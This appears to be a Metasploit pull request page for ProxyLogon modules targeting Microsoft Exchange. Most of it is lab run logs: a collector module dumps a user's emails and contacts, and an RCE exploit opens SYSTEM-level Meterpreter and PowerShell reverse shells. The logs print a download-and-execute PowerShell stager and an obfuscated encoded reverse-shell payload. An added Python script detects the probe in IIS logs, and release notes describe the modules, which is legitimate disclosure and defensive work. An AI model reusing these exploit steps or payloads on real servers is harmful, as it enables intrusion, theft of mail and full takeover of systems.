[*] Download item: FwAAABYAAADAU+qesN5XT7uSUxtdH/HzAAABXCXo
[+] File saved to /home/msfuser/.msf4/loot/20210323121324_default_<redacted>_TestUserDAadlab_578516.txt
[*]
[*] Download item: CQAAABYAAADAU+qesN5XT7uSUxtdH/HzAAABUbwk
[+] File saved to /home/msfuser/.msf4/loot/20210323121325_default_<redacted>_TestUserDAadlab_193278.txt
[*]
[*] Download item: FwAAABYAAADAU+qesN5XT7uSUxtdH/HzAAAAufk2
[+] File saved to /home/msfuser/.msf4/loot/20210323121325_default_<redacted>_TestUserDAadlab_145315.txt
[*]
[*] Download item: CQAAABYAAADAU+qesN5XT7uSUxtdH/HzAAAAABUp
[+] File saved to /home/msfuser/.msf4/loot/20210323121325_default_<redacted>_TestUserDAadlab_538870.txt
[*]
[*] Download item: CQAAABYAAADAU+qesN5XT7uSUxtdH/HzAAAAABUo
[+] File saved to /home/msfuser/.msf4/loot/20210323121325_default_<redacted>_TestUserDAadlab_253075.txt
[*]
[*] Auxiliary module execution completed
msf6 auxiliary(gather/exchange_proxylogon_collector) > set action Dump (Contacts)
action => Dump (Contacts)
msf6 auxiliary(gather/exchange_proxylogon_collector) > run
[*] Running module against <redacted>

[*] https://<redacted>:443 - Attempt to exploit for CVE-2021-26855
[*] Internal server name (SRV02)
[*] https://<redacted>:443 - Sending autodiscover request
[*] Server: f652b961-f28e-448f-a8c6-5ff447ff06dd@adlab.local
[*] LegacyDN: /o=ExchangeLab/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=536cfe04ed60470a9a06efe4dfceebf6-Domain admin
[*] Internal target(s): https://srv02.adlab.local/owa/, https://srv03.adlab.local/owa/, https://srv04.adlab.local/owa/
[*] https://<redacted>:443 - Selecting the first internal server to respond
[+] Targeting internal: https://srv03.adlab.local/owa/
[*] https://<redacted>:443 - Attempt to dump contacts for <TestUserDA@adlab.local>
[+] Successfuly connected to: contacts
[*] Selected folder: contacts (AQAWAFRlc3RVc2VyREFAYWRsYWIubG9jYWwALgAAA9Bu0QNzfSJCtyNN8/MAO/3dAQDAU+qesN5XT7uSUxtdH/HzAAACAQ4AAAA=)
[*] Number of contact found: 1
[*] https://<redacted>:443 - Processing dump of 1 items
[+] File saved to /home/msfuser/.msf4/loot/20210323121436_default_<redacted>_TestUserDAadlab_692912.txt
[*] Auxiliary module execution completed
msf6 auxiliary(gather/exchange_proxylogon_collector) > loot

Loot
====

host           service  type                             name                 content          info  path
----           -------  ----                             ----                 -------          ----  ----
<redacted>           TestUserDA@adlab.local_contacts                       text/plain             /home/msfuser/.msf4/loot/20210323121436_default_<redacted>_TestUserDAadlab_692912.txt
<redacted>           TestUserDA@adlab.local_inbox     msf_cheat_sheet.pdf  application/pdf        /home/msfuser/.msf4/loot/20210323121324_default_<redacted>_TestUserDAadlab_302614.pdf
<redacted>           TestUserDA@adlab.local_inbox                          text/plain             /home/msfuser/.msf4/loot/20210323121324_default_<redacted>_TestUserDAadlab_578516.txt
<redacted>           TestUserDA@adlab.local_inbox                          text/plain             /home/msfuser/.msf4/loot/20210323121325_default_<redacted>_TestUserDAadlab_193278.txt
<redacted>           TestUserDA@adlab.local_inbox                          text/plain             /home/msfuser/.msf4/loot/20210323121325_default_<redacted>_TestUserDAadlab_145315.txt
<redacted>           TestUserDA@adlab.local_inbox                          text/plain             /home/msfuser/.msf4/loot/20210323121325_default_<redacted>_TestUserDAadlab_538870.txt
<redacted>           TestUserDA@adlab.local_inbox                          text/plain             /home/msfuser/.msf4/loot/20210323121325_default_<redacted>_TestUserDAadlab_253075.txt
<redacted>           TestUserDA@adlab.local_inbox                          text/plain             /home/msfuser/.msf4/loot/20210323121324_default_<redacted>_TestUserDAadlab_926179.txt
RCE exploit module (exchange_proxylogon_rce)
msf6 exploit(windows/http/exchange_proxylogon_rce) > options

Module options (exploit/windows/http/exchange_proxylogon_rce):

   Name              Current Setting         Required  Description
   ----              ---------------         --------  -----------
   EMAIL             TestUserDA@adlab.local  yes       A known email address for this organization
   METHOD            POST                    yes       HTTP Method to use for the check (Accepted: GET, POST)
   Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            <redacted>              yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             443                     yes       The target port (TCP)
   SRVHOST           0.0.0.0                 yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT           8080                    yes       The local port to listen on.
   SSL               true                    no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                                   no        The URI to use for this exploit (default is random)
   UseAlternatePath  false                   yes       Use the IIS root dir as alternate path
   VHOST                                     no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     <redacted>       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Powershell


msf6 exploit(windows/http/exchange_proxylogon_rce) > set verbose true
verbose => true
msf6 exploit(windows/http/exchange_proxylogon_rce) > run

[-] Handler failed to bind to <redacted>:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Using auxiliary/scanner/http/exchange_proxylogon as check
[+] https://<redacted>:443 - The target is vulnerable to CVE-2021-26855.
[+] Obtained HTTP response code 500 for https://<redacted>/ecp/UT.js.
[*] Scanned 1 of 1 hosts (100% complete)
[+] The target is vulnerable.
[*] https://<redacted>:443 - Attempt to exploit for CVE-2021-26855
[*] Internal server name (SRV02)
[*] https://<redacted>:443 - Sending autodiscover request
[*] Server: f652b961-f28e-448f-a8c6-5ff447ff06dd@adlab.local
[*] LegacyDN: /o=ExchangeLab/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=536cfe04ed60470a9a06efe4dfceebf6-Domain admin
[*] https://<redacted>:443 - Sending mapi request
[*] SID: S-1-5-21-<redacted>-<redacted>-<redacted>-1113 (TestUserDA@adlab.local)
[*] https://<redacted>:443 - Sending ProxyLogon request
[*] Try to get a good msExchCanary (by patching user SID method)
[*] Try to get a good msExchCanary (without correcting the user SID)
[*] ASP.NET_SessionId: 66d5ddfa-50c8-4884-bf42-bc515baccad4
[*] msExchEcpCanary: GNjsq_R9KkaXojAV3mFh8sO7v2SA79gI4Dd-q-MVyCpLTDThkmh8YqwiQa3ul1s5koIhoNijVu0.
[*] OAB id: 9855d88e-3c84-40d3-bec1-3729028bed82 (OAB (Default Web Site))
[*] https://<redacted>:443 - Attempt to exploit for CVE-2021-27065
[*] Prepare the payload on the remote target
[*] Write the payload on the remote target
[!] Wait a lot (0)
[+] Yeeting windows/x64/meterpreter/reverse_tcp payload at <redacted>:443
[*] Powershell command length: 2494
[*] Sending stage (200262 bytes) to <redacted>
[*] Meterpreter session 1 opened (<redacted>:4444 -> <redacted>:40487) at 2021-03-23 12:23:37 +0100
[*] Sending stage (200262 bytes) to <redacted>
[*] Meterpreter session 2 opened (<redacted>:4444 -> <redacted>:40486) at 2021-03-23 12:23:37 +0100
[-] Failed to load client script file: /home/msfuser/dev/src/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb
[+] Deleted C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\fohKcFS.aspx

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : SRV02
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : ADLAB
Logged On Users : 11
Meterpreter     : x64/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] <redacted> - Meterpreter session 2 closed.  Reason: User exit

msf6 exploit(windows/http/exchange_proxylogon_rce) > set target 1
target => 1
msf6 exploit(windows/http/exchange_proxylogon_rce) > run

[-] Handler failed to bind to <redacted>:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Using auxiliary/scanner/http/exchange_proxylogon as check
[+] https://<redacted>:443 - The target is vulnerable to CVE-2021-26855.
[+] Obtained HTTP response code 500 for https://<redacted>/ecp/NqX.js.
[*] Scanned 1 of 1 hosts (100% complete)
[+] The target is vulnerable.
[*] https://<redacted>:443 - Attempt to exploit for CVE-2021-26855
[*] Internal server name (SRV02)
[*] https://<redacted>:443 - Sending autodiscover request
[*] Server: f652b961-f28e-448f-a8c6-5ff447ff06dd@adlab.local
[*] LegacyDN: /o=ExchangeLab/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=536cfe04ed60470a9a06efe4dfceebf6-Domain admin
[*] https://<redacted>:443 - Sending mapi request
[*] SID: S-1-5-21-<redacted>-<redacted>-<redacted>-1113 (TestUserDA@adlab.local)
[*] https://<redacted>:443 - Sending ProxyLogon request
[*] Try to get a good msExchCanary (by patching user SID method)
[*] Try to get a good msExchCanary (without correcting the user SID)
[*] ASP.NET_SessionId: 8b7eddee-192f-42ee-9a04-2710fd0b7588
[*] msExchEcpCanary: mvv8cTCO3UeLf-PPdPYMZehxebOB79gI5rApeoWHFr2JoXyW2r02nlVSyayEOLNcEVX0l4jSPLo.
[*] OAB id: 4f335561-2d67-4bfd-8ff9-66fcae512133 (OAB (Default Web Site))
[*] https://<redacted>:443 - Attempt to exploit for CVE-2021-27065
[*] Prepare the payload on the remote target
[*] Write the payload on the remote target
[!] Wait a lot (0)
[+] Yeeting windows/x64/meterpreter/reverse_tcp payload at <redacted>:443
[*] Using URL: http://0.0.0.0:8080/eY7D8QBOsfm
[*] Local IP: http://<redacted>:8080/eY7D8QBOsfm
[*] Generated command stager: ["powershell.exe -c Invoke-WebRequest -OutFile %TEMP%\\NnTGIBmx.exe http://<redacted>:8080/eY7D8QBOsfm;%TEMP%\\NnTGIBmx.exe;del %TEMP%\\NnTGIBmx.exe"]
[*] Client <redacted> (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.3866) requested /eY7D8QBOsfm
[*] Sending payload to <redacted> (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.3866)
[*] Client <redacted> (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.3866) requested /eY7D8QBOsfm
[*] Sending payload to <redacted> (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.3866)
[*] Sending stage (200262 bytes) to <redacted>
[*] Meterpreter session 3 opened (<redacted>:4444 -> <redacted>:41143) at 2021-03-23 12:33:05 +0100
[*] Sending stage (200262 bytes) to <redacted>
[*] Meterpreter session 4 opened (<redacted>:4444 -> <redacted>:41144) at 2021-03-23 12:33:05 +0100
[+] Deleted C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\MWqc.aspx
[*] Server stopped.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : SRV02
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : ADLAB
Logged On Users : 11
Meterpreter     : x64/windows
meterpreter > [*] Shutting down Meterpreter...

msf6 exploit(windows/http/exchange_proxylogon_rce) > set target 2
target => 2
msf6 exploit(windows/http/exchange_proxylogon_rce) > run

[-] Handler failed to bind to <redacted>:4444
[*] Started reverse SSL handler on 0.0.0.0:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Using auxiliary/scanner/http/exchange_proxylogon as check
[+] https://<redacted>:443 - The target is vulnerable to CVE-2021-26855.
[+] Obtained HTTP response code 500 for https://<redacted>/ecp/Zy.js.
[*] Scanned 1 of 1 hosts (100% complete)
[+] The target is vulnerable.
[*] https://<redacted>:443 - Attempt to exploit for CVE-2021-26855
[*] Internal server name (SRV02)
[*] https://<redacted>:443 - Sending autodiscover request
[*] Server: f652b961-f28e-448f-a8c6-5ff447ff06dd@adlab.local
[*] LegacyDN: /o=ExchangeLab/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=536cfe04ed60470a9a06efe4dfceebf6-Domain admin
[*] https://<redacted>:443 - Sending mapi request
[*] SID: S-1-5-21-<redacted>-<redacted>-<redacted>-1113 (TestUserDA@adlab.local)
[*] https://<redacted>:443 - Sending ProxyLogon request
[*] Try to get a good msExchCanary (by patching user SID method)
[*] Try to get a good msExchCanary (without correcting the user SID)
[*] ASP.NET_SessionId: d916fea4-ee6a-45db-9b07-a0e493f47a41
[*] msExchEcpCanary: T8_IPsZBMECKP2TyTIpOrUT2CASC79gI_0j82qxLYtwtOScv0jFuiv5Txd_8DQJFVeHgbMlW5HM.
[*] OAB id: 121ef40e-fc81-4639-97cf-27b4d093ee26 (OAB (Default Web Site))
[*] https://<redacted>:443 - Attempt to exploit for CVE-2021-27065
[*] Prepare the payload on the remote target
[*] Write the payload on the remote target
[!] Wait a lot (0)
[+] Yeeting cmd/windows/powershell_reverse_tcp payload at <redacted>:443
[*] Generated payload: powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
[*] Powershell session session 5 opened (<redacted>:4444 -> <redacted>:41364) at 2021-03-23 12:35:14 +0100
[!] Tried to delete C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\PnYm.aspx, unknown result
[*] Powershell session session 6 opened (<redacted>:4444 -> <redacted>:41365) at 2021-03-23 12:35:35 +0100

indows PowerShell running as user SRV02$ on SRV02
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>whoami
nt authority\system
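The run log above shows what the scanner check looks like from the server side: a request for a short random name under `/ecp/` ending in `.js` that the target answered with HTTP 500. As an added defender-side example (not part of this PR or of Metasploit), the following parses IIS W3C extended logs and flags records matching that signature; the log lines are constructed, the field order follows a typical IIS `#Fields:` header, and the assumed name length (1 to 8 characters) is an approximation of the random names seen above.

```python
import re
from typing import Dict, Iterator, List

# Assumed probe shape, generalised from the names in the run log (UT.js, NqX.js, Zy.js):
# a short alphanumeric file name directly under /ecp/ with a .js extension.
PROBE_RE = re.compile(r"^/ecp/[A-Za-z0-9]{1,8}\.js$", re.IGNORECASE)


def parse_iis_w3c(lines) -> Iterator[Dict[str, str]]:
    """Yield one dict per log record, keyed by the most recent '#Fields:' header.

    IIS writes space-separated fields and replaces spaces inside values
    (e.g. User-Agent) with '+', so a plain split on spaces is safe.
    """
    fields: List[str] = []
    for raw in lines:
        line = raw.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # truncated or malformed record: skip rather than misalign columns
        yield dict(zip(fields, values))


def find_ecp_probes(lines) -> List[Dict[str, str]]:
    """Return records where an /ecp/<short>.js request was answered with HTTP 500.

    A 500 on such a path can have benign causes, so the result is a triage list
    (client IP, time, user agent) rather than a verdict.
    """
    hits: List[Dict[str, str]] = []
    for rec in parse_iis_w3c(lines):
        if rec.get("sc-status") == "500" and PROBE_RE.match(rec.get("cs-uri-stem", "")):
            hits.append(rec)
    return hits


# Constructed sample log (not from the PR); addresses are documentation ranges.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2021-03-23 11:13:24 10.0.0.5 POST /ecp/UT.js - 443 - 198.51.100.7 Mozilla/5.0+(constructed) 500 0 0 12
2021-03-23 11:13:30 10.0.0.5 GET /owa/auth/logon.aspx - 443 - 203.0.113.9 Mozilla/5.0+(constructed) 200 0 0 45
2021-03-23 11:14:01 10.0.0.5 GET /ecp/default.aspx - 443 - 203.0.113.9 Mozilla/5.0+(constructed) 302 0 0 3
"""

if __name__ == "__main__":
    for rec in find_ecp_probes(SAMPLE_LOG.splitlines()):
        print(rec["date"], rec["time"], rec["c-ip"], rec["cs-method"], rec["cs-uri-stem"], rec["cs(User-Agent)"])
```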

@cdelafuente-r7 cdelafuente-r7 merged commit 37b0552 into rapid7:master Mar 23, 2021
cdelafuente-r7 (Contributor) commented Mar 23, 2021:

Original Release Notes

This adds 3 modules that leverage two Microsoft Exchange Server vulnerabilities patched in March out-of-band security updates:

  • A scanner module that checks if the target is vulnerable to a Server-Side Request Forgery (SSRF) identified as CVE-2021-26855.
  • An auxiliary module that dumps the mailboxes for a given email address, including emails, attachments and contact information. This module leverages the same SSRF vulnerability identified as CVE-2021-26855.
  • An exploit module that exploits an unauthenticated Remote Code Execution on Microsoft Exchange Server. This allows execution of arbitrary commands as the SYSTEM user. This module leverages the same SSRF vulnerability identified as CVE-2021-26855 and also a post-auth arbitrary-file-write vulnerability identified as CVE-2021-27065.

@cdelafuente-r7 cdelafuente-r7 added the rn-modules release notes for new or majorly enhanced modules label Mar 23, 2021
@mekhalleh mekhalleh deleted the exchange_proxylogon_scanner branch March 23, 2021 13:56
pbarry-r7 (Contributor):

Release Notes

New module auxiliary/scanner/http/exchange_proxylogon checks if a Microsoft Exchange Server target is vulnerable to a Server-Side Request Forgery (SSRF) identified as CVE-2021-26855.

New module auxiliary/gather/exchange_proxylogon_collector dumps, for a given email address, the mailboxes on vulnerable Microsoft Exchange Server targets, including emails, attachments, and contact information. This module leverages the same SSRF vulnerability identified as CVE-2021-26855.

New module exploits/windows/http/exchange_proxylogon_rce achieves an unauthenticated Remote Code Execution on vulnerable Microsoft Exchange Server targets, allowing for execution of arbitrary commands as the SYSTEM user. This module leverages the same SSRF vulnerability identified as CVE-2021-26855 and also a post-auth arbitrary-file-write vulnerability identified as CVE-2021-27065.
